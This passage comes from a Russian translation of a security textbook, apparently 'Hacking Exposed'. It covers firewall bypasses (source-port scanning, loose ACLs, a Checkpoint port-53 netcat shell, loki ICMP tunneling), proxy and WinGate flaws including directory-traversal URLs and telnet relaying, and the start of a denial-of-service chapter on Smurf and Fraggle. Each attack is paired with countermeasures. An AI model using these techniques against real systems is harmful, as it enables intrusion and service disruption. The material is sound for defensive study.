    Если обнаружится, что брандмауэр не сохраняет состояние соединений, то можно воспользоваться этим преимуществом и приступить к атаке уязвимых узлов, расположенных за этим брандмауэром. С помощью модифицированной утилиты перенаправления портов, например Fpipe от группы Foundstone, можно задать исходный порт 20, а затем приступить к атаке целевого узла через брандмауэр.

    Контрмеры: защита и сканирования с исходного порта Предотвращение



    Решить описанную проблему очень просто, однако это решение выглядит не очень эффектным. Необходимо запретить любые сетевые взаимодействия, для которых требуется комбинация из нескольких портов (FTP), либо перейти к промежуточным программным брандмауэрам или тем, которые сохраняют состояние соединений. При этом можно значительно повысить управляемость входящими и исходящими соединениями, а также реально контролировать весь процесс.


    1.gif

    Изображение: 

    6. Фильтрация пакетов



    Фильтрация пакетов


    Работа брандмауэров с фильтрацией пакетов (в том числе с сохранением состояний) типа Firewall-1 от компании CheckPoint, PIX и IOS от компании Cisco (да, IOS тоже можно использовать в качестве брандмауэра) основывается на списках ACL или правилах, служащих для определения того, является ли авторизованным трафик, передаваемый в/из внутренней сети. В большинстве случаев эти списки грамотно разработаны и их очень трудно обойти. Однако зачастую можно обойти брандмауэры с нестрогим списком ACL и передать отдельные пакеты во внутреннюю сеть.

    Нестрогие списки ACL



    Нестрогие списки ACL применяются на гораздо большем числе брандмауэров, чем это можно себе представить. Предположим, что провайдеру услуг Internet какой-то организации необходимо разрешить перенос зоны. В этом случае вместо нестрогого списка ACL, такого как "Разрешить выполнение действий с сервера DNS провайдера услуг Internet с исходного TCP-порта 53 и порта назначения 53", может быть реализован следующий: "Разрешить выполнение любых действий с исходного TCP-порта 53". Подобные ошибки в конфигурации могут оказаться поистине разрушительными, поскольку злоумышленник сможет просканировать всю сеть извне. Большинство из таких атак начинается со сканирования узла, расположенного позади брандмауэра, и использования в качестве исходного ложного TCP-порта 53 (DNS).

    Контрмеры против нестрогих списков ACL 


    Предотвращение



    Удостоверьтесь, что правила вашего брандмауэра разрешают лишь определенные подключения. Например, если вашему провайдеру услуг Internet требуется выполнять перенос зоны, это должно быть явно указано в установленных правилах. При этом требуйте указания в правиле как исходного IP-адреса, так и IP-адреса назначения (внутреннего сервера DNS).
    Если вы используете брандмауэр Checkpoint, то для ограничения возможности использования исходного порта 53 (DNS) лишь службой DNS провайдера можно реализовать следующее правило. Например, если адресом сервера DNS провайдера является 192.168.66.2, а адресом внутреннего сервера DNS — 172.30.140.1, то это правило будет иметь следующий вид.


    Source   Destination Service   Action   Track
    (источник) (назначение) (служба)   (действие)   (регистрация)
    192.168.66.2 172.30.140.1 domain-tcp Accept  Short

    Обход брандмауэров Checkpoint



    Брандмауэры Checkpoint 3.0 и 4.0 предоставляют открытые порты по умолчанию. Порты, используемые для обратного поиска DNS (UDP 53), переноса зоны DNS (TCP 53) и маршрутизации (RIP, UDP 520), могут задействоваться любьш узлом для доступа к любому узлу. В дополнение ко всему эти операции не регистрируются в системных журналах. В результате после "захвата" узла внутренней сети у взломщика появляются интересные возможности.
    Выше вы узнали, насколько просто идентифицировать брандмауэр Checkpoint. На основе полученных знаний злоумышленник может эффективно обойти его правила. Однако для осуществления такого подхода должно выполняться несколько существенных предварительных условий. Сначала взломщик должен получить в свое распоряжение компьютер, расположенный позади брандмауэра, или обманным путем внедрить на внутренний узел "троянского коня".
    В любом случае на взломанном узле должна быть запущена программа прослушивания netcat. Эта утилита либо обеспечит доступ взломщика к удаленной командной оболочке, либо предоставит ему возможность вводить команды и выполнять их локально на удаленном узле. Подобные "потайные ходы" подробно рассматриваются в главе 14, а сейчас для лучшего понимания проблемы мы лишь кратко рассмотрим описанный подход.
    Как видно из следующего рисунка, брандмауэр Checkpoint пропускает данные через TCP-порт 53 без регистрации. После установки на взломанном удаленном узле программы netcat, связанной с портом 53, и "захвата" удаленной командной оболочки /bin/sh через свой собственный порт 53, находящийся в состоянии ожидания запросов, взломщик "прорубит окно" в брандмауэре и получит доступ к любой системе.


    Контрмеры: защита от обхода брандмауэров CheckPoint


    Предотвращение



    В зависимости от требований к конфигурации можно запретить большую часть трафика, разрешенного по умолчанию. При этом необходимо соблюдайте осторожность, поскольку можно случайно запретить и передачу авторизованных данных. Для ограничения доступа выполните следующие действия.
    1. В диалоговом окне редактирования политики безопасности выберите команду Policy1* Properties.
    2. Сбросьте флажки Accept, расположенные рядом с именами всех функций, которые не являются необходимыми. Например, пользователям многих узлов не требуется выполнять загрузку данных DNS. В этом случае нужно сбросить флажок Accept Domain Name Downloads. Этот же прием можно использовать также для управления трафиком RIP и DNS.
    3. Создайте свое собственное правило, разрешающее обмен данными DNS с определенным авторизованным сервером DNS (как описано в разделе "Контрмеры Против Нестрогих Списков ACL").

    Туннелирование трафика ICMP и UDP



    Туннелирование трафика ICMP — это возможность инкапсуляции реальных данных в заголовке пакета ICMP. Против такой атаки бессильны многие маршрутизаторы, разрешающие прохождение ICMP-пакетов ECHO, ECHO REPLY и UDP-пакетов. Подобно ситуации с брандмауэром CheckPoint, связанной с передачей данных DNS, возможность использования туннелирования трафика ICMP и UDP базируется на том, что в распоряжении взломщика уже имеется взломанный узел, находящийся позади брандмауэра.
    Джереми Раух (Jeremy Rauch) и Майк Шифман (Mike Schiffman) тщательно исследовали эту концепцию и создали средства для ее использования: утилиты loki и lokid (клиент и сервер).  После запуска сервера lokid на взломанном узле, расположенном позади брандмауэра, который разрешает прохождение ICMP-пакетов ECHO и ECHO REPLY, взломщик может запустить клиентскую часть (loki), чтобы помешать каждую передаваемую серверу lokid команду в ICMP-пакет ECHO. После этого утилита lokid будет "извлекать" полученные команды, выполнять их локально, а затем помешать полученные результаты в ICMP-пакеты ECHO REPLY и передавать их обратно взломщику. При использовании такого подхода у злоумышленников имеется возможность полного обхода брандмауэра. Описанная концепция и средства, которые ее реализуют, подробно рассматриваются в главе 14.

    Контрмеры: защита от туннелирования трафика ICMP и UDP


    Предотвращение



    Для зашиты от атак такого типа можно полностью запретить доступ по протоколу 1СМР через брандмауэр или обеспечить управляемую избирательную передачу ICMP-пакетов. Например, следующий список ACL брандмауэров Cisco позволит полностью запретить передачу административных данных ICMP за пределы подсети 172.29.10.0 (демилитаризованной зоны).

    access-list 101 permit icmp any 172.29.10.0 0.255.255.255 8!
    echo access-list 101 permit icmp any 172.29.10.0 0.255.255.255 0!
    echo-reply access-list 102 deny ip any any log!
    запретить, иначе регистрировать все события

    Если ваш провайдер услуг Internet отслеживает работоспособность компьютеров, расположенных позади брандмауэра, с помощью утилиты ping (чего мы не советуем делать), то такие списки ACL нарушат этот процесс. Уточните у своего провайдера, применяет ли он эту утилиту.


    2.gif

    Изображение: 

    7. Изъяны программных посредников



    Изъяны программных посредников


    Вообще, уязвимость программных посредников не очень высока. После зашиты самого брандмауэра и реализации надежных правил, используемых программным посредником, вероятность обхода брандмауэра будет значительно ниже. Однако, как и следует ожидать, зачастую брандмауэр оказывается настроен неправильно.

    Имя узла: localhost



    Ранние программные посредники системы UNIX не заботились о необходимости ограничения локального доступа. Несмотря на контроль пользователей, использующих Internet, было вполне возможно, чтобы внутренний пользователь мог получить локальный доступ к самому брандмауэру. Несомненно, при использовании такой атаки требуется знание корректного имени пользователя или пароля, используемых на брандмауэре. Однако вы очень удивитесь после того, как узнаете, насколько легко их подобрать в некоторых случаях. Для того чтобы проверить, уязвим ли ваш программный посредник подобным атакам, выполните следующие действия.
    После появления на экране приглашения на регистрацию

    С:\> nc -v -n 192.168.51.129 23
    (UNKNOWN)[192.168.51.129] 23 (?) open
    Eagle Secure Gateway.
    Hostname:

    1. Введите localhost.
    2. Введите известное имя пользователя и пароль (или попробуйте с нескольких попыток их подобрать).
    3. Если процесс аутентификации успешно завершился, значит, вы получили локальный доступ на брандмауэре.
    4. Воспользуйтесь одним из средств генерации переполнения локального буфера (например, утилитой rdist) или любой другой аналогичной программой, чтобы получить привилегии администратора.

    Контрмеры: защита от использования имени localhost


    Предотвращение



    Способ устранения ошибок в конфигурации во многом зависит от типа используемого брандмауэра. В любом случае можно реализовать правило, ограничивающее возможность доступа с определенных узлов. Конечно, лучше всего вообще запретить регистрацию с использованием имени localhost. Однако если это все же необходимо, установите TCP-оболочку, с помощью которой можно разрешить соединение лишь узлам с определенными IP-адресами.

    Неавторизованный внешний доступ к программному посреднику



    Такой подход наиболее пригоден для доступа к брандмауэрам, реализующим прозрачные функции, однако мы довольно часто сталкиваемся с его использованием. Администратор может уделить самое пристальное внимание обеспечению безопасности брандмауэра и установить строгие правила доступа, однако в то же время забыть о необходимости блокирования доступа извне. В этом случае сразу же возникнет два типа опасности: (1) взломщик может воспользоваться proxy-сервером для атак на всевозможные узлы Internet, активно применяя изъяны сценариев CG1 и различные методы мошенничества в Web, и (2) с помощью средств Web злоумышленник сможет получить доступ к вашей интрасети. Нам приходилось встречать подобным образом сконфигурированные брандмауэры и каждый раз мы могли получить доступ ко всей корпоративной интрасети.
    Дня того чтобы узнать, уязвим ли ваш брандмауэр для такой атаки, измените в броузере параметры proxy-сервера так, чтобы они указывали на подозрительный (т.е. проверяемый) брандмауэр. В броузере Netscape для этого выполните следующие действия.
    1. Выберите команду Edit>Preferences.
    2. Выделите поддеревья Advanced и Proxies.
    3. Щелкните на кнопке Manual Proxy Configuration.
    4. Щелкните на кнопке View.
    5. Добавьте адрес тестируемого брандмауэра в соответствующий список адресов HTTP и выберите порт, находящийся в состоянии прослушивания. (Обычно 80, 81. 8000 или 8080, однако реальные номера могут значительно варьироваться. Для определения корректного порта воспользуйтесь утилитой шпар или другим аналогичным средством.)
    6. Введите в броузере адрес своего любимого Web-узла и следите за информацией, появляющейся в строке состояния.
    Если в строке состояния отобразится адрес proxy-сервера, а затем на экране появится Web-стрпница, то, очевидно, вы имеете дело с неавторизованным proxy-сервером.
    Если у вас имеется IP-адрес внутреннего Web-узла (не важно, маршрутизируется он или нет), то аналогичным образом можно попытаться получить доступ и к нему. Иногда этот внутренний IP-адрес можно встретить во время просмотра исходного кода HTTP. Зачастую Web-дизайнеры помещают имена узлов и IP-адреса в атрибуте HREF дескрипторов Web-страниц.

    Контрмеры: защита от неавторизованного внешнего доступа к программному посреднику


    Предотвращение



    Для того чтобы предотвратить такую атаку, нужно запретить доступ к программному посреднику со стороны внешнего интерфейса брандмауэра. Поскольку конкретный алгоритм решения этой задачи сильно зависит от производителя, свяжитесь с ним для получения более подробной дополнительной информации.
    На уровне сети необходимо ограничить входящий трафик к программному посреднику на пограничных маршрутизаторах. Это без особых проблем можно осуществить с помощью задания списков ACL этих маршрутизаторов.


    8. Изъяны WinGate



    Изъяны WinGate



    Известно, что популярный программный брандмауэр WinGate систем Windows 95/NT (http://wingate.deerfield.com/) обладает несколькими уязвимыми местами. Большинство из них связано со значениями параметров, установленными по умолчанию, разрешающими неавторизованное использование служб telnet, SOCKS и Web. Хотя доступ к этим службам можно ограничить на уровне отдельных пользователей (и интерфейсов), в большинстве случаев установка и использование этого программного пакета выполняется без учета каких бы то ни было требований к защите. Список серверов WinGate можно найти на узле группы энтузиастов CyberArmy по адресу http://www.cyberarmy.com/wingate/.

    Неавторизованный просмотр



    Как и многие другие неправильно сконфигурированные программные посредники, определенные версии брандмауэра WinGate (в частности, 2.1 для NT) позволяют внешним пользователям абсолютно анонимно просматривать Internet. Такая возможность оказывается чрезвычайно важной для взломщиков, нацеленных на "захват" приложений Web-сервера, поскольку ею содержимое можно получить без риска быть пойманным. Защититься от Web-атак очень сложно, поскольку весь трафик туннелируется и направляется на порт 80. Более подробно хакинг Web рассматривается в главе 15.
    Для того чтобы проверить, уязвим ли ваш сервер WinGate, выполните следующие действия.
    1. Подключитесь к Internet с использованием нефильтруемого соединения (лучше всего удаленного).
    2. Измените параметры броузера так, чтобы они указывали на proxy-сервер.
    3. Задайте адрес проверяемого сервера и номер требуемого порта.
    Еще одним изъяном конфигурации, используемой по умолчанию, является возможность неавторизованного доступа к службе SOCKS (TCP 1080). Как и в случае открытого TCP-порта 80, используемого службами Web, взломщик может просматривать ресурсы Internet, оставаясь практически полностью незамеченным (особенно, если отключен режим регистрации системных событий).

    Контрмеры: защита от неавторизованного просмотра


    Предотвращение



    Для того чтобы нейтрализовать описанный изъян сервера WinGate, нужно просто ограничить привязку определенных служб. Для ограничения использования служб proxy-сервера на многоадаптерном (multihomed) узле выполните следующие действия.
    1. Откройте диалоговое окно свойств службы SOCKS или WWW Proxy Server.
    2. Перейдите во вкладку Bindings.
    3. Выберите режим Connections Will Be Accepted On The Following Interface Only и задайте внутренний интерфейс сервера WinGate.
    Лучший подарок хакеру: . неконтролируемый доступ к службе telnet
    Неавторизованный доступ к службе telnet гораздо опаснее возможности просмотра ресурсов Web. Средства telnet чрезвычайно важны для взломщика. Подключившись к службе telnet неправильно сконфигурированного WinGate, злоумышленники могут использовать его для сокрытия следов своей деятельности. Для поиска уязвимых серверов выполните следующие действия.
    1. С помошью утилиты telnet попробуйте подсоединиться к серверу.

    [root]* telnet 172.29.11.191
    Trying 172.29.11.191... Connected to 172.29.11.191.
    Escape character is 1/s]'. Wingate> 10.50.21.5

    2. После появления на экране приведенного выше текста введите адрес узла для подключения.
    3. Если на экране появилось новое приглашение для регистрации, значит, вы имеете дело с уязвимым сервером.

    Connecting to host 10.50.21.5...Connected
    SunOS 5.6
    login:

    Контрмеры: защита от неавторизованного доступа к службе telnet


    Предотвращение



    В данном случае можно воспользоваться теми же рекомендациями, что приведены в разделе " Контрмеры: Защита От Неавторизованного Просмотра". Для устранения проблемы просто ограничьте привязку определенных служб сервера WinGate. На многоадаптерном узле выполните для этого следующие действия.
    1. Откррйте диалоговое окно свойств сервера Telnet.
    2. Перейдите во вкладку Bindings.
    3. Выберите режим Connections Will Be Accepted On The Following Interface Only и задайте внутренний интерфейс сервера WinGate.

    Просмотр файлов



    Согласно одной из статей бюллетеня Digital Security Advisory сервер WinGate 3.0 через порт управления 8010 позволяет любому пользователю просматривать файлы системы. Для того чтобы проверить, уязвима ли ваша система, выполните следующие инструкции.

    http://192.168.51.101:8010/c:/
    http://192.168.51.101:8010//
    http://192.168.51.101:8010/..../

    Если система уязвима, то вы сможете просмотреть каждый файл каталога, а также перемещаться по иерархии каталогов по своему усмотрению. Такая возможность чрезвычайно опасна, поскольку некоторые приложения хранят имена пользователей и пороли в виде незашифрованного текста. Например, если для удаленного управления серверами на вашем компьютере установлены программы Remotely Possible или ControlIT компании Computer Associates, то имена пользователей и пароли, используемые при аутентификации, хранятся либо в незашифрованном виде, либо в форме, которую не составляет труда расшифровать (см. главу 13).

    Контрмеры: предотвращение просмотра файлов



    Для текущей версии сервера WinGate в настоящее время нет модуля обновления, позволяющего устранить проблему просмотра файлов. Для получения более подробной информации о доступных модулях обновления обратитесь на соответствующий узле поддержки по адресу http: /wingate.deerfield.com/helpdesk/.


    9. Резюме



    Резюме


    На самом деле правильно сконфигурированный брандмауэр оказывается чрезвычайно хорошо защищенным. Однако при использовании средств сбора информации, таких как утилиты traceroute, hping и nmap, взломщики могут исследовать потенциальные пути прохождения маршрутизатора и брандмауэра, а также определить их тип (или как минимум сделать на этот счет определенные предположения). Большинство из известных в настоящее время изъянов связано с неправильной настройкой брандмауэра или недостаточным вниманием к его администрированию. Использование взломщиком любого из них может привести к настоящей катастрофе.
    Кроме того, в обоих типах брандмауэров имеются свои собственные специфические изъяны, в том числе возможность использования служб Web, telnet и локальной регистрации. Для предотвращения большинства из рассмотренных слабых мест можно воспользоваться определенными контрмерами, однако в некоторых случаях возможно лишь их выявление.
    Многие считают, что в будущем неизбежно произойдет слияние обоих технологий — программных посредников и брандмауэров с фильтрацией пакетов, — что позволит ограничить количество ошибок, возникающих при их конфигурировании в настоящее время. Подсистема противодействия также станет составной частью брандмауэров нового поколения. Компания NAI уже реализовала свою архитектуру такой подсистемы — Active Security. После выявления вторжения она позволяет автоматически инициировать предопределенные изменения конфигурации сервера, подвергнувшегося атаке. Например, если системой выявления вторжений обнаружено туннелирование пакетов ICMP, то она может направить брандмауэру сообщение о необходимости игнорирования запросов ECHO. Однако в таком сценарии по-прежнему остается место для атак DoS, так что сотрудникам службы безопасности не стоит забывать об этом.


    Глава 12. Атаки DoS



    Глава 12. АТАКИ DOS




    1. Атаки DoS



    Атаки DoS


    Взрыв и медленно рассеивающееся облако. Нет, сейчас речь пойдет не о детском безалкогольном напитке. Мы познакомимся с различными средствами, которыми пользуются взломщики. В последние годы их применение приводит к опустошительному хаосу в Internet. Ежегодно атаки DoS (Denial of Service — отказ в обслуживании) стоят различным компаниям миллионы долларов и таят в себе серьезную угрозу для любой системы или сети. Все эти убытки обусловлены длительным простоем системы, упущенным доходом и большим объемом работ по идентификации и подготовке адекватных ответных мер. По существу, атака DoS нарушает или полностью блокирует обслуживание легитимных пользователей, сетей, систем или других ресурсов. Цель любой из таких атак обычно не имеет ничего общего с благими намерениями, и ее достижение зачастую не требует высокой квалификации, поскольку все необходимые средства абсолютно доступны.
    Одной из последних атак DoS оказались подвержены несколько известных Web-узлов, таких как Yahoo, eBay, Buy.com, CNN.com, E*TRADE и ZDNet, что привело к их кратковременной неработоспособности. Эти атаки были предприняты в феврале 2000 года. Требуемые контрмеры, а также восстановление работоспособности удалось осуществить лишь через несколько дней. Эти атаки из-за присущей им жестокости были сразу же охарактеризованы как распределенные атаки DoS (Distributed DoS), последствия которых являются гораздо более разрушительными, чем результаты обычных атак DoS. Еще одним доказательством преступной сущности взломщиков стала другая известная атака DoS. Как упоминалось в журнале PC Week, в сентябре 1996 года провайдер услуг Internet Нью-Йорка, компания PANIX (Public Access Networks Corporations), в течение недели находилась на осадном положении, что привело к невозможности обслуживания около 6000 отдельных пользователей и 1000 компаний. Эта атака базировалась на использовании изъяна в основном протоколе Internet (TCP/IP), а также на способе обработки системами запросов SYN. Эта ситуация усугублялась еще тем, что взломщики для сокрытия своей личности использовали ложные исходные адреса. Таким образом, значительно затруднялось выявление реальных злоумышленников. Эти события оказали огромное влияние на сообщество Internet и еще раз подчеркнули несостоятельность применяемых в глобальной сети технологий обеспечения безопасности. Хотя уже несколько лет назад подобные атаки были теоретически предсказаны, только в настоящее время можно оценить всю опасность деловой активности в Век Информатизации.


    2. Причины использования атак DoS



    Причины использования атак DoS



    На протяжении этой книги обсуждались и демонстрировались многочисленные средства и приемы, используемые взломщиками для нарушения системы защиты различных систем. Зачастую политика обеспечения безопасности, реализованная в целевой системе или сети, способна предотвратить проникновение неквалифицированных злоумышленников. Ощущая свое бессилие, взломщик может прибегнуть к последнему средству — атаке DoS.
    Кроме того, к атаке DoS могут прибегнуть те злоумышленники, у которых есть личная или политическая неприязнь к некоторым людям или организациям. Такая тенденция явно просматривается в атаке DoS, предпринятой в мае 1999 года. На протяжении нескольких недель Web-узлы ФБР и других правительственных организаций США были подвергнуты злобным атакам DoS, которые являлись ответом хакеров на предпринятый против них рейд. Многие эксперты по вопросам безопасности считают, что число таких атак возрастает из-за быстрого распространения систем Windows NT/95/98. Система Windows — заветная цель многих взломщиков. Кроме того, многие средства DoS абсолютно доступны, и для их использования не требуется высокая квалификация.
    Хотя большинство атак связано с приведенными выше мотивами, некоторые из них могут пригодиться взломщикам и для взлома уязвимой системы. Как печально известно многим администраторам системы Windows NT, для вступления в силу внесенных изменений ее нужно перезагрузить. Таким образом, после внесения изменений в параметры NT, которые в будущем позволят взломщику получить привилегии администратора, он должен вызвать крах системы с ее последующей перезагрузкой. Несмотря на то что эта ситуация должна привлечь внимание администраторов, большинство из них не обращают на нее никакого внимания и без особых раздумий перезагружают систему.
    Мы не в состоянии перечислить все возможные причины использования атак DoS. Можно лишь сказать, что киберпространство является полным отражением реальной жизни. Некоторые получают удовольствие от своей разрушительной деятельности и черпают дополнительные силы, наблюдая за мощью предпринятой ими атаки DoS. Как ни странно, большинство хакеров-профессионалов питают отвращение к атакам DoS, однако есть и люди, которые ими пользуются. К сожалению, атаки DoS становятся мощным оружием террористов киберпространства, что свидетельствует о наступлении нового электронного тысячелетия.


    3. Типы атак DoS



    Типы атак DoS



    Зачастую гораздо проще нарушить функционирование сети или системы, чем на самом деле получить к ней доступ. Сетевые протоколы типа TCP/IP были разработаны для применения в открытом и доверенном сообществе пользователей, и его текущая версия 4 унаследовала все слабые места своих предшественников. Кроме того, многие операционные системы и сетевые устройства имеют различные изъяны в используемой реализации сетевого стека, что значительно снижает их способность противостоять атакам DoS. Мы были свидетелями, как на устройствах управления различными процессами, в которых использовался устаревший стек протокола IP, сбой происходил от простого перенаправления ICMP с некорректным параметром. Поскольку существует много средств для реализации атак DoS, очень важно идентифицировать их типы, а также разобраться с тем, как выявить и предотвратить эти атаки. Сначала мы познакомимся с теорией, лежащей в основе четырех стандартных типов атак DoS.


    4. Насыщение полосы пропускания



    Насыщение полосы пропускания


    Наиболее коварной формой атак DoS является насыщение полосы пропускания (bandwidth consumption). По существу, взломщики могут заполнить всю доступную полосу пропускания определенной сети. Это можно осуществить и в локальной сети, однако чаще всего злоумышленники захватывают ресурсы удаленно. Для реализации такой атаки можно воспользоваться двумя сценариями.

    Сценарий 1



    Взломщик может насытить сетевое подключение целевой системы, воспользовавшись более широкой полосой пропускания. Такой сценарий вполне возможен, если злоумышленник обладает сетевым подключением Т1 (1.544 Мбит/с) или более быстрым, и лавинно заполняет сетевое соединение с полосой пропускания 56 или 128 Кбит/с. Это эквивалентно столкновению трактора-тягача с автомобилем Yugo: большее транспортное средство, или в данном случае канал, наверняка станет победителем в этой битве. Этот тип атак не ограничивается возможностью применения к низкоскоростным сетевым соединениям. Нам встречались ситуации, когда взломщики получали доступ к сетям с полосой пропускания более 100 Мбит/с. Для атаки на Web-узел и насыщения его канала взломщику достаточно иметь канал Т1.

    Сценарий 2



    Взломщики усиливают атаку DoS, вовлекая в процесс насыщения целевого сетевого соединения несколько узлов. Воспользовавшись таким подходом, сеть с доступом ТЗ (45 Мбит/с) можно насытить с помощью канала связи 56 Кбит/с. Благодаря чему это возможно? Используя другие узлы для усиления атаки DoS, взломщик с помощью ограниченной полосы пропускания может насытить полосу пропускания 100 Мбит/с. Для того чтобы успешно реализовать эту возможность, взломщик должен привлечь дополнительные узлы. Как вы увидите ниже в данной главе, в некоторых случаях осуществить усиление атаки гораздо проще, чем может показаться на первый взгляд.
    На протяжении всей книги многократно упоминалось об опасности трафика ICMP. Несмотря на то, что пакеты ICMP удобно использовать для сетевой диагностики, можно легко захватить трафик ICMP и воспользоваться им для атак с насыщением полосы пропускания. Кроме того, такие атаки могут оказаться еще более разрушительными, поскольку большинство взломщиков скрывают свой адрес. Это значительно затрудняет выявление реального злоумышленника.


    5. Недостаток ресурсов



    Недостаток ресурсов


    Атака, приводящая к недостатку ресурсов (resource starvation), отличается от предыдущей атаки тем, что она направлена на захват системных ресурсов, таких как центральный процессор, память, дисковые квоты или другие системные процессы. Зачастую взломщик обладает легитимным доступом к ограниченному количеству системных ресурсов. Однако он предпринимает попытку захватить и дополнительные ресурсы. Таким образом, система или законные пользователи будут испытывать недостаток в совместно используемых ресурсах. Атаки такого типа обычно приводят к недоступности ресурса, и, следовательно, к краху системы, переполнению файловой системы или зависанию процессов.


    6. Ошибки программирования



    Ошибки программирования


    Ошибки программирования (programming flaw) заключаются в неспособности приложения, операционной системы или логической микросхемы обрабатывать исключительные ситуации. Обычно эти ситуации возникают при передаче уязвимому элементу несанкционированных данных. Взломщики будут много раз передавать пакеты, в которых не учитываются рекомендации документов RFC, чтобы определить, способен ли сетевой стек справиться с этими исключениями или это приведет к панике ядра (kernel panic) или краху всей системы. Для определенных приложений, которым требуются пользовательские входные данные, взломщики будут передавать строковые данные длиной в тысячи строк. Если программой используется буфер фиксированной длины, скажем, 128 байт, то злоумышленники попробуют сгенерировать условие переполнения буфера и вызвать крах приложения. Что еще хуже, взломщики могут также выполнить привилегированные команды, как описывалось в главах 5 и 7. Ошибки программирования часто встречаются и в логических микросхемах. Печально известная атака под названием Pentium f00f основывается на том, что пользовательский процесс, выполнив некорректную инструкцию 0xf 00f c7c8, приведет к краху любой операционной системы.
    Не трудно догадаться, что программы, операционной системы или даже центрального процессора, в которых отсутствуют любые дефекты, не существует. Взломщикам прекрасно известна эта аксиома. Будьте уверены, что они полностью воспользуются преимуществами краха важных приложений. К сожалению, в большинстве случаев все атаки происходят в совершенно неподходящее время.


    7. Маршрутизация и атаки DNS



    Маршрутизация и атаки DNS


    Такие атаки DoS основываются на манипуляции записями таблицы маршрутизации, что приводит к прекращению обслуживания легитимных систем или сетей. Большинство протоколов маршрутизации, такие как RIP версии 1 (Routing Information Protocol) и ВОР (Border Gateway Protocol), не имеют вообще или используют слабые алгоритмы аутентификации. Это предоставляет взломщикам прекрасную возможность изменять маршруты, зачастую указывая ложный исходный IP-адрес и вызывая состояние отказа в обслуживании. В результате таких атак трафик целевой сети маршрутизируется через сеть взломщика или в черную дыру, т.е. в никуда — в сеть, которой не существует.
    Атаки DoS, направленные на серверы DNS, также являются достаточно эффективными. Большинство таких атак приводит к кэшированию на целевом сервере фиктивных адресов. Когда сервер DNS выполняет обратный поиск, взломщик может перенаправить его на требуемый узел или в некоторых случаях в "черную дыру". Существует несколько типов подобных атак, которые приводят к тому, что большие узлы в течение продолжительного времени оказываются недоступными.



    #1 - Запросы клиента передаются на Web-узел компании Microsoft, при этом броузер пытается разрешить имя www microsoft com в IP-адрес #2 - Буфер сервера DNS был модифицирован взломщиком, поэтому возвращается IP-адрес сервера www hacker.com, а не сервера компании Microsoft #3 - Теперь компьютер взломщика выдает себя за www microsoft.com


    1.gif

    Изображение: 

    8. Общие атаки DoS



    Общие атаки DoS


    Некоторые атаки DoS можно использовать для нескольких типов систем. Мы будем называть такие атаки общими (generic). В основном общие атаки направлены на насыщение полосы пропускания или захват ресурсов. Стандартным элементом атак этого типа является манипулирование протоколами. При использовании протокола ICMP одновременно можно воздействовать на несколько систем. Например, взлом-шик может воспользоваться "почтовой бомбой" и отправить тысячи почтовых сообщений целевой системе, чтобы насытить полосу пропускания и истощить ресурсы почтового сервера. Хотя вирус Melissa не планировалось использовать в качестве средства генерации атаки DoS, однако на гребне лавины почтовых сообщений он может привести к краху почтового сервера. Его саморепликация оказалась настолько успешной, что из-за недостатка ресурсов почтовые серверы просто завершают свою работу.
    Поскольку невозможно проанализировать все условия возникновения состояния DoS, оставшуюся часть мы посвятим атакам DoS, применимым к большинству компьютерных сетей.

    Атака Smurf



    Атака Smurf — это одна из наиболее опасных атак DoS, поскольку при ее реализации на целевые узлы осуществляется усиленное воздействие. Эффект усиления возникает из-за рассылки направленных широковещательных ping-запросов на узлы сети, которые должны сгенерировать ответные сообщения. Направленный широковещательный запрос может передаваться либо на сетевой адрес, либо на сетевой широковещательный адрес, однако в любом случае требуется устройство, выполняющее преобразование данных уровня 3 (IP) к уровню 2 (сеть). (Более подробную информацию по этому вопросу можно получить в документе RFC 1812, Requirements for IP Version 4 Routers.) Если предполагается, что сеть принадлежит к классу С, то сетевым адресом будет .0, а широковещательным адресом — .255. Направленные широковещательные запросы обычно используются для диагностики, позволяя выявить функционирующие узлы без использования утилиты ping отдельно для каждого адреса используемого диапазона.
    Атака Smurf позволяет воспользоваться преимуществами рассылки широковещательных направленных запросов и требует как минимум трех участников: взломщика, усиливающей сети (amplifying network) и цели. Злоумышленник отправляет ложные ICMP-пакеты ECHO на широковещательный адрес усиливающей сети. Исходный адрес пакетов подменяется так, как будто бы сама жертва сгенерировала запрос. Затем начинается самое интересное. Как только пакет ECHO передается на широковещательный адрес, все системы усиливающей сети сгенерируют ответ на запрос узла-жертвы (если не запланированы какие-нибудь другие действия). Если взломщик отсылает один ICMP-пакет в усиливающую сеть, в которой содержится 100 узлов, генерирующих ответные сообщения на широковещательный запрос, то можно считать, что взломщик в сто раз увеличил эффективность атаки DoS. Отношение количества переданных пакетов к числу узлов, генерирующих ответные сообщения, мы называем коэффициентом усиления (amplification ratio). Таким образом, взломщик постарается найти усиливающую сеть с большим коэффициентом усиления, чтобы увеличить вероятность насыщения трафика целевой сети.
    Для того чтобы лучше познакомиться с атакой такого рода, рассмотрим пример. Предположим, что взломщик отправил 14 К данных ICMP на широковещательный адрес усиливающей сети со ста узлами. Сеть взломщика подсоединена к Internet через двухканальное соединение ISDN; усиливающая сеть — через линию связи ТЗ (45 Мбит/с); а целевая сеть — через канал Т1 (1.544 Мбит/с). Нетрудно подсчитать, что в данном случае взломщику удастся сгенерировать 14 Мбит данных, которые будут отправлены в целевую сеть. Это практически не оставит ей шансов на выживание, поскольку вся доступная полоса пропускания линии связи Т1 будет быстро занята.
    Один из вариантов описанного подхода называется атакой Fraggle ("осколочная граната"). При этом выполняются все те же действия, за исключением того, что вместо ICMP-пакетов используются дейтаграммы UDP. Взломщик может отправлять ложные пакеты UDP на широковещательный адрес усиливающей сети, обычно на порт 7 (echo). При этом каждый узел или сеть с активной службой echo сгенерируют для целевого узла ответное сообщение, тем самым значительно увеличивая количество передаваемых данных. Если на каком-либо из узлов усиливающей сети служба echo отключена, то будет сгенерировано ICMP-сообщение о недостижимости, что также приведет к насыщению полосы пропускания.

    Контрмеры: защита от атак Smurf



    Для того чтобы предотвратить возможность использования вашей сети (компьютера) для усиления, запретите прохождение направленных широковещательных запросов на пограничном маршрутизаторе. На маршрутизаторах Cisco для этого можно воспользоваться командой no ip directed-broadcast. На устройствах Cisco IOS версии 12 этот режим включен по умолчанию. При использовании других устройств обратитесь к документации, входящей в комплект поставки.
    Кроме того, некоторые операционные системы можно настроить так, чтобы отбрасывались все широковещательные ICMP-пакеты ECHO.

    Системы Solaris 2.6, 2.5.1, 2.5, 2.4 и 2.3



    Чтобы предотвратить генерацию ответных сообщений на запросы ECHO в системах Solaris, добавьте в файл /etc/rc2 .d/S69inet следующую строку, ndd -set /dev/ip ip_respond_to_echo_broadcast 0

    Linux



